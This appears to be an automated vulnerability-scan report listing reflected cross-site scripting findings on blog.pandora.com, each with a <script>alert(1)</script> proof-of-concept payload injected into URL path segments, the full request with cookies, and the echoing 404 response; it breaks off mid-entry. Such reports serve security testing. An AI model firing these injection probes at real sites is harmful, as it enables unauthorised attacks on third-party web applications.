HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e5b4<script>alert(1)</script>6e5ab5102c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc67e<script>alert(1)</script>34ab249b04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cc4e<script>alert(1)</script>4b764c67cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 366
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd53e<script>alert(1)</script>7f56f5a8144 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>e925b373d1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e86cc<script>alert(1)</script>2286b5dabd7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d3cd<script>alert(1)</script>a8a76e357fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25283<script>alert(1)</script>32ad766d12b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac8ae<script>alert(1)</script>07d5f78715a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f003<script>alert(1)</script>c2c8f4a2ec0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1b2a<script>alert(1)</script>283fea933c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ed28<script>alert(1)</script>2b8c9060753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43add<script>alert(1)</script>997001f8093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f01a6<script>alert(1)</script>b621b2a3f06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70767<script>alert(1)</script>cc798d55c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d529c<script>alert(1)</script>b54dc99c7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d9cb<script>alert(1)</script>1d67bc84c6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 352 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31f0f<script>alert(1)</script>5b0b1194bdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b9f5<script>alert(1)</script>be7f68e6c8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5a5f<script>alert(1)</script>64acfed229b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
